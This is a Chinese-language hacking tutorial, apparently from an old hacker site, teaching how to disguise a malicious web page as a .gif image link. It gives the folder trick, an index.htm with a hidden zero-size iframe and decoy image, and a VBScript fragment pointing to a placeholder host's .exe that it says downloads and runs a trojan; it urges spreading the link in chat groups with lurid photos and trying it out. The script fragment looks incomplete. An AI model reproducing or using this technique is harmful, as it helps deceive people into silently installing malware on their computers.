图片木马
当别人给你一个地址比如:http://www.*****.com/upload/20081208/200812081.gif
的时候是不是狠天真的以为是一个图片呢?
答案狠简单。那狠有可能就是一个网马地址!如果我们弄些比如艳门照之类的发群里。这个看大家自己发挥了。我们现在讲讲实现的方法!
首先在自己空间上建立个文件夹:upload 然后在upload里面在建立个文件夹:20081208然后在在20081208文件夹里在建立个文件夹:200812081.gif
OK 建立这些后。我们在名为200812081.gif的文件夹内建立一个htm文件里面内容:
<html>
<iframe src="wangma.htm" height=0 width=0></iframe>
<img src="image.gif"></center>
</html>
保存为index.htm
然后再建立个htm文件里面内容是:
on error resume next
furl_0="http://www.xxxx.com/xxx.exe"
mbb71l=""
保存为wangma.htm http://www.xxxx.com/xxx.exe就是你的木马。尽量用下载者。
然后在把你那吸引人的照片放到200812081.gif 这个文件夹内 照片名字是image格式gif
OK!这些东西做完了后。http://www.*****.com/upload/20081208/200812081.gif
就是网马地址了!
下面我们来解释为什么。
首先访问:http://www.*****.com/upload/20081208/200812081.gif
就是直接访问:http://www.*****.com/upload/20081208/200812081.gif/index.htm
为什么很简单。因为因为直接输入文件夹默认访问首页文件index.htm
下面我们看看index.htm:
<html>
<iframe src="wangma.htm" height=0 width=0></iframe>
<img src="image.gif"></center>
</html>
<img src="image.gif"> 插入了一张图片image.gif 别人访问200812081.gif的时候执行
index.htm,而<img src="image.gif">就插入一图,让别人以为他看到的image.gif图!
而wangma.htm:
on error resume next
furl_0="http://www.xxxx.com/xxx.exe"
mbb71l=""
这代码的意思就是下载并运行你的木马了!
是不是觉得狠有意思?想不想试试?自己去弄吧!多看几次。多想想就会懂了!
上一篇:应用Snort入侵的大体步骤
下一篇:手把手教你攻下80端口